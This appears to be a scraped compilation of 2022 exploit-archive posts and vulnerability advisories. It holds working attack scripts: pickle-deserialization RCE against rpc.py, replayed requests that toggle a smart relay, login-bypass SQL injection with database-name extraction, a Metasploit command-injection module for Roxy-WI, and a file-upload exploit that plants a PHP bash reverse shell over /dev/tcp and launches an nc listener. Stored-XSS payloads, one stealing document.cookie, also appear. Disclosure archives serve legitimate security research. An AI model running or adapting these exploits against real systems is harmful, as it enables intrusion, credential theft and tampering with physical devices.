<pre><code># Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 2022-07-12<br /># Exploit Author: Elias Hohl<br /># Vendor Homepage: https://github.com/abersheeran<br /># Software Link: https://github.com/abersheeran/rpc.py<br /># Version: v0.4.2 - v0.6.0<br /># Tested on: Debian 11, Ubuntu 20.04<br /># CVE : CVE-2022-35411<br /><br />import requests<br />import pickle<br /><br /># Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py<br /><br />HOST =3D "127.0.0.1:65432"<br /><br />URL =3D f"http://{HOST}/sayhi"<br /><br />HEADERS =3D {<br /> "serializer": "pickle"<br />}<br /><br /><br />def generate_payload(cmd):<br /><br /> class PickleRce(object):<br /> def __reduce__(self):<br /> import os<br /> return os.system, (cmd,)<br /><br /> payload =3D pickle.dumps(PickleRce())<br /><br /> print(payload)<br /><br /> return payload<br /><br /><br />def exec_command(cmd):<br /><br /> payload =3D generate_payload(cmd)<br /><br /> requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)<br /><br /><br />def main():<br /> exec_command('curl http://127.0.0.1:4321')<br /> # exec_command('uname -a')<br /><br /><br />if __name__ =3D=3D "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Incorrect Authorization [CWE-863]<br />Date found: 2022-07-13<br />Date published: 2022-07-22<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-2461<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />When installed Transposh comes with a set of pre-configured options, one of these<br />is the "Who can translate" setting under the "Settings" tab, which by default<br />allows "Anonymous" users to add translations via the plugin's "tp_translation"<br />ajax action.<br /><br />Successful exploits can allow an unauthenticated attacker to add translations to<br />the WordPress site and thereby influence what is actually shown on the site.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept adds a new translation<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: [host]<br />Content-Length: 75<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0<br /><br />action=tp_translation&ln0=en&sr0=rcesecurity.com&items=1&tk0=rcesecurity.com&tr0=rcesecurity.com<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-13: Discovery of the vulnerability<br />2022-07-13: CVE requested from WPScan (CNA)<br />2022-07-18: No response from WPScan<br />2022-07-18: CVE requested from Wordfence (CNA) instead<br />2022-07-18: Sent note to vendor<br />2022-07-18: Wordfence assigns CVE-2022-2461<br />2022-07-20: Since there are currently no plans to provide fixes at all:<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
<pre><code># Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass<br /># Google Dork: NA<br /># Date: 13th July 2022<br /># Exploit Author: Victor Hanna (Trustwave SpiderLabs)<br /># Author Github Page: https://9lyph.github.io/CVE-2022-29593/<br /># Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html<br /># Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download<br /># Version: V3.1.276A<br /># Tested on: MAC OSX<br /># CVE : CVE-2022-29593#!/usr/local/bin/python3<br /># Author: Victor Hanna (SpiderLabs)<br /># DingTian DT-R002 2CH Smart Relay<br /># CWE-294 - Authentication Bypass by Capture-replay<br /><br />import requests<br />import re<br />import urllib.parse<br />from colorama import init<br />from colorama import Fore, Back, Style<br />import sys<br />import os<br />import time<br /><br />from urllib3.exceptions import InsecureRequestWarning<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />def banner():<br /> print ("[+]********************************************************************************[+]")<br /> print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")<br /> print ("| Description: DingTian DT-R002 2CH Smart Relay |")<br /> print ("| Usage : "+sys.argv[0]+" <host> <relay#> |") <br /> print ("[+]********************************************************************************[+]")<br /><br />def main():<br /> os.system('clear')<br /> banner()<br /> urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"<br /> urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"<br /> urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"<br /> urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"<br /><br /> headers = {<br /> "Host": ""+host+"",<br /> "User-Agent": "9lyph/3.0",<br /> "Accept": "*/*",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "DNT": "1",<br /> "Connection": "close",<br /> "Referer": "http://"+host+"/relay_cgi.html",<br /> "Cookie": "session=4463009"<br /> }<br /><br /> print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")<br /> for i in range(5):<br /> time.sleep (1)<br /> print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")<br /> try:<br /> if (relay == "1"):<br /> print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)<br /> r = requests.get(urlRelay1On)<br /> time.sleep (5)<br /> print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)<br /> r = requests.get(urlRelay1Off)<br /> print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")<br /> elif (relay == "2"):<br /> print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)<br /> r = requests.get(urlRelay2On)<br /> time.sleep (5)<br /> print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)<br /> r = requests.get(urlRelay2Off)<br /> print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")<br /> else:<br /> print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)<br /> except KeyboardInterrupt:<br /> sys.exit(1)<br /> except requests.exceptions.Timeout:<br /> print ("[!] Connection to host timed out !")<br /> sys.exit(1)<br /> except requests.exceptions.Timeout:<br /> print ("[!] Connection to host timed out !")<br /> sys.exit(1)<br /> except Exception as e:<br /> print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)<br /><br />if __name__ == "__main__":<br /> if len(sys.argv)>2: <br /> host = sys.argv[1]<br /> relay = sys.argv[2]<br /> main ()<br /> else:<br /> print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)<br /> <br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Cross-Site Scripting [CWE-79]<br />Date found: 2021-08-19<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br />CVE: CVE-2021-24911<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.7 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin's ajax action "tp_translation" which is available to authenticated or<br />unauthenticated users (see CVE-2022-2461) allows to submit new translations.<br /><br />Translations submitted this way are shown on the Transposh administrative<br />interface on the pages "tp_main" and "tp_editor". However, since the plugin does<br />not properly validate and sanitize the submitted translation, arbitrary Javascript<br />code can be permanently injected and executed directly within the backend across<br />all users visiting the page with the roles of at least "Subscriber" and up to<br />"Administrator".<br /><br />This offers a wide range of possible attacks, such as redirecting the user to a<br />malicious page, spoofing content on the page, or attacking the browser and its<br />plugins.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following PoC adds a new translation:<br /><br /><html><br /> <body><br /> <form action="http://[host]/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="tp_translation" /><br /> <input type="hidden" name="ln0" value="en" /><br /> <input type="hidden" name="sr0" value="0" /><br /> <input type="hidden" name="items" value="1" /><br /> <input type="hidden" name="tk0" value="xss<script>alert(1337)</script>" /><br /> <input type="hidden" name="tr0" value="test" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update the plugin to version 1.0.8.1<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-08-19: Discovery of the vulnerability<br />2021-08-20: Contacted the vendor via their contact form<br />2021-08-20: Vendor response<br />2021-08-20: Sent all the PoC exploits<br />2021-08-20: Vendor acknowledges the issues<br />2021-09-14: Requested status update from vendor<br />2021-10-07: No response from vendor, requested status update again<br />2021-10-25: CVE requested from WPScan (CNA)<br />2021-10-27: WPScan assigns CVE-2021-24911<br />2022-02-22: Vendor releases 1.0.8, which fixes this vulnerability<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://transposh.org/version-1-0-8-thanks-julien/<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)<br /># Date: 21/07/2022<br /># Exploit Author: Steffin Stanly<br /># Vendor Homepage: https://github.com/lesterchan/wp-useronline<br /># Software Link: https://wordpress.org/plugins/wp-useronline/<br /># Version: <=2.87.6<br /># Tested on Windows<br /><br />How to reproduce vulnerability:<br /><br />1. Install WordPress 6.0.1<br />2. Install and activate WP-UserOnline plugin.<br />3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site.<br />4. Add the following payload "><script>alert(1)</script> and save changes<br />5. On visiting the dashboard, You will observe that the payload successfully got stored in the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.<br /><br /></code></pre>
<pre><code># Exploit Title: Loan Management System - Stored XSS on several parameters<br /># Date: 28/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: sourcecodester<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />There are several functions and parameter affected as below:<br /><br />addUser.php<br />- firstname<br />- lastname<br /><br />save_ltype.php<br />- ltype_name<br />- ltype_desc<br /><br />save_borrower.php<br />- firstname<br />- middlename<br />- lastname<br />- address<br /><br />The payload use to inject is "/><svg/onload=alert(document.cookie)><br /></code></pre>
<pre><code># Exploit Title: Loan Management System - SQL Injection via login page<br /># Date: 28/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: sourcecodester<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br /># The attack vector for the SQL Injection happened at the login page. The login can be bypass using the boolean payload below to gain access as Admin as the highest privileges.<br /><br /># Payload --> 'or 2=2#<br /><br /># The python script to get the database name from SQL Injection Vulnerability can be execute below.<br /><br />import requests, string, sys, warnings, time, concurrent.futures<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore',InsecureRequestWarning)<br /><br />dbname = ''<br /><br />req = requests.Session()<br /><br />def login(ip,username,password): <br /> target = "http://%s/LMS/login.php" %ip<br /><br /> data = {'username': username,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /><br /> if 'Login Successful' in response.text:<br /> print("[$] Success Login with credentials "+username+":"+password+"")<br /> else:<br /> print("[$] Failed Login with credentials "+username+":"+password+"")<br /><br />def check_injection():<br /> # library inj<br /> test_query0 = "'or 1=2#"<br /> test_query1 = "'or 2=2#"<br /><br /> target = "http://%s/LMS/login.php" %ip<br /><br /> result = ""<br /><br /> for i in range(2):<br /><br /> if i==0:<br /> data = {'username': test_query0,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /> if response.text=="success":<br /> result = response.text<br /> else:<br /> pass<br /> if i==1:<br /> data = {'username': test_query1,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /> if response.text=="success":<br /> result = response.text<br /> else:<br /> pass<br /> if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>":<br /> print("[##] SQLI Boolean-Based Present at password field :)")<br /> else:<br /> print("[##] No SQLI :)")<br /><br />def brute(dbname,password):<br /> target = "http://%s/LMS/login.php" %ip<br /><br /> l=0<br /><br /> # checking length of dbname star with i = 1<br /> for i in (n+1 for n in range(9)):<br /><br /> payload = "'or 2=2 and length(database())='"+ str(i) +"'#"<br /> #print(payload)<br /> <br /> data = {'username': payload,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /> result = response.text<br /> #print(result)<br /><br /> if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>":<br /> print("[##] The correct length of DB name is "+str(i))<br /> l=i<br /> break<br /> else:<br /> print("[##] The length of DB name "+str(i)+" is wrong")<br /> pass<br /><br /> char = [char for char in string.ascii_lowercase]<br /> char.append('_')<br /> #print(char)<br /> dbname = []<br /><br /> for i in range(l):<br /> for j in char:<br /> payload = "'or 2=2 and substring(database()," + str(i+1) + ",1)='" + str(j) +"'#"<br /> <br /> data = {'username': payload,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /> result = response.text<br /> #print(payload)<br /> #print(result)<br /><br /> if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>":<br /> dbname.append(j)<br /> print("[+] The " + str(i+1) + " char of DB name is "+str(j))<br /> break<br /> else:<br /> pass<br /><br /> dbname = ''.join(dbname)<br /> <br /> print("[+] Database name retrieved --> "+dbname)<br /> print("[+] Bypass completed :)")<br /> print("[+] Bypass payload can be used is \n'or 2=2#")<br /><br /> username = "'or 2=2#"<br /><br /> print("\nRetry to login with new payload in password field")<br /> login(ip,username,password)<br /><br />if __name__ == "__main__":<br /> print(" _____ _ __ ")<br /> print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br /> print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br /> print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br /> print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br /> print(" /____/ \n\n")<br /><br /> try:<br /> ip = sys.argv[1].strip()<br /> username = sys.argv[2].strip()<br /> password = sys.argv[3].strip()<br /><br /> login(ip,username,password)<br /> check_injection()<br /> brute(dbname,password)<br /> <br /> except IndexError:<br /> print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.149.130 admin admin123" % sys.argv[0])<br /> sys.exit(-1)<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in Roxy-WI<br /> prior to version 6.1.1.0. Successful exploitation results in remote code execution<br /> under the context of the web server user.<br /><br /> Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory<br /> ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information<br /> ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch<br /> ['CVE', '2022-31137']<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'WfsDelay' => 25<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['printf'],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-07-06',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> return send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),<br /> 'vars_post' => {<br /> 'serv' => '127.0.0.1',<br /> 'ipbackend' => "\"; #{cmd} ;#",<br /> 'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),<br /> 'backend_server' => '127.0.0.1'<br /> }<br /> }, 10<br /> )<br /> rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT<br /> return nil<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} is vulnerable!")<br /><br /> res = execute_command('id')<br /><br /> return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res<br /><br /> if res.code == 200 && res.body =~ /uid=\d+\(.+\)/<br /> print_status("#{peer} is vulnerable!")<br /> return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')<br /> elsif res.code == 200<br /> return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')<br /> else<br /> return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")<br /> end<br /> end<br /><br /> def exploit<br /> print_status('Exploiting...')<br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Hospital Information System - SQL Injection via login page<br /># Date: 25/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: https://code-projects.org<br /># Software Link: https://download-media.code-projects.org/2019/11/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br /><br />import requests, string, sys, warnings, time, concurrent.futures<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore',InsecureRequestWarning)<br /><br />dbname = ''<br /><br />req = requests.Session()<br /><br />def login(ip,username,password): <br /> target = "http://%s/HIS/includes/users/UsersController.php" %ip<br /><br /> data = {'type':'login','username':username,'password':password}<br /> response = req.post(target, data=data)<br /><br /> if 'success' in response.text:<br /> print("[$] Success Login with credentials "+username+":"+password+"")<br /> else:<br /> print("[$] Failed Login with credentials "+username+":"+password+"")<br /><br />def check_injection():<br /> # library inj<br /> test_query0 = "'or 1=2#"<br /> test_query1 = "'or 1=1#"<br /><br /> target = "http://%s/HIS/includes/users/UsersController.php" %ip<br /><br /> result = ""<br /><br /> for i in range(2):<br /><br /> if i==0:<br /> data = {'type':'login','username':username,'password':test_query0}<br /> response = req.post(target, data=data)<br /> if response.text=="success":<br /> result = response.text<br /> else:<br /> pass<br /> if i==1:<br /> data = {'type':'login', 'username':username,'password':test_query1}<br /> response = req.post(target, data=data)<br /> if response.text=="success":<br /> result = response.text<br /> else:<br /> pass<br /> if result=="success":<br /> print("[##] SQLI Boolean-Based Present at password field :)")<br /> else:<br /> print("[##] No SQLI :)")<br /><br />def brute(dbname):<br /> target = "http://%s/HIS/includes/users/UsersController.php" %ip<br /><br /> l=0<br /><br /> no = [int(a) for a in str(string.digits)]<br /> # checking length of dbname<br /> for i in no: # 0-9<br /><br /> payload = "'or 1=1 and length(database())='"+ str(i) +"'#"<br /> #print(payload)<br /> <br /> data = {'type':'login','username':username,'password':payload}<br /> response = req.post(target, data=data)<br /> result = response.text<br /><br /> if result=="success":<br /> print("[##] The correct length of DB name is "+str(i))<br /> l=i<br /> break<br /> else:<br /> print("[##] The length of DB name "+str(i)+" is wrong")<br /> pass<br /><br /> char = [char for char in string.ascii_lowercase]<br /> dbname = []<br /><br /> for i in range(l):<br /> for j in char:<br /> payload = "'or 1=1 and substring(database()," + str(i+1) + ",1)='" + str(j) +"'#"<br /> <br /> data = {'type':'login','username':username,'password':payload}<br /> response = req.post(target, data=data)<br /> result = response.text<br /><br /> if result=="success":<br /> dbname.append(j)<br /> print("[+] The " + str(i+1) + " char of DB name is "+str(j))<br /> break<br /> else:<br /> pass<br /><br /> dbname = ''.join(dbname)<br /> <br /> print("[+] Database name retrieved --> "+dbname)<br /> print("[+] Bypass completed :)")<br /> print("[+] Bypass payload can be used is \n'or 1=1#")<br /><br /> password = "'or 1=1#"<br /> print("\nRetry to login with new payload in password field")<br /> login(ip,username,password)<br /><br />if __name__ == "__main__":<br /> print(" _____ _ __ ")<br /> print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br /> print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br /> print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br /> print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br /> print(" /____/ \n\n")<br /><br /> try:<br /> ip = sys.argv[1].strip()<br /> username = sys.argv[2].strip()<br /> password = sys.argv[3].strip()<br /><br /> login(ip,username,password)<br /> check_injection()<br /> brute(dbname)<br /> <br /> except IndexError:<br /> print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.100.x admin admin123" % sys.argv[0])<br /> sys.exit(-1)<br /></code></pre>
<pre><code># Exploit Title: Garage Management System Remote Code Execution via File Upload<br /># Date: 24/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip<br /># Version: 1.0<br /># Tested on: Centos 7 + MySQL<br /><br />import requests, subprocess, string, sys, warnings, time, concurrent.futures<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore',InsecureRequestWarning)<br />from netifaces import interfaces, ifaddresses, AF_INET<br /><br />req = requests.Session()<br /><br />proxies = {<br /> 'http':'http://127.0.0.1:8080', <br /> 'https':'http://127.0.0.1:8080',<br /> }<br /><br />def login(ip,username,password): <br /> target = "http://%s/garage/garage/login.php" %ip<br /> data = {'username':username,'password':password, 'login':''}<br /> response = req.post(target, data=data)<br /><br /> if 'Login Successfully' in response.text:<br /> print("[$] Success Login :)")<br /> trigger_rce(req)<br /> else:<br /> print("[$] Failed Login :(")<br /><br />def creata_rs():<br /> for ifaceName in interfaces():<br /> addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]<br /> if ifaceName=="eth0":<br /> ipadd = ' '.join(addresses)<br /> f = open("saitamang.php", "w")<br /> payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+str(ipadd)+"/1234 0>&1'\")?>"<br /> f.write(payload)<br /> f.close()<br /> else:<br /> pass<br /><br />def trigger_rce(req):<br /> creata_rs()<br /> target = "http://%s/garage/garage/php_action/createProduct.php" %ip<br /><br /> multipart_form_data = {<br /> "currnt_date": (None,""),<br /> "productImage": ("saitamang.php", open("saitamang.php", "rb")),<br /> "productName" : (None,"test"),<br /> "quantity" : (None,"1"),<br /> "rate" : (None,"1"),<br /> "brandName" : (None,"1"),<br /> "categoryName" : (None,"1"),<br /> "productStatus" : (None,"1"),<br /> "create" : (None,"")<br /> }<br /><br /> response = req.post(target, files=multipart_form_data)<br /><br /> print("[$] Enjoy your RCE :)")<br /> req.get("http://%s/garage/garage/assets/myimages/saitamang.php" %ip)<br /><br /><br />if __name__ == "__main__":<br /> print(" _____ _ __ ")<br /> print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br /> print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br /> print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br /> print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br /> print(" /____/ \n\n")<br /> <br /> try:<br /> ip = sys.argv[1].strip()<br /><br /> username = "mayuri.infospace@gmail.com"<br /> password = "rootadmin"<br /><br /> subprocess.call(['terminator', '-e', 'nc -lvp 1234'])<br /> time.sleep(2)<br /> login(ip,username,password)<br /> <br /> except IndexError:<br /> print("[-] Usage %s <ip>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.100.x" % sys.argv[0])<br /> sys.exit(-1)<br /></code></pre>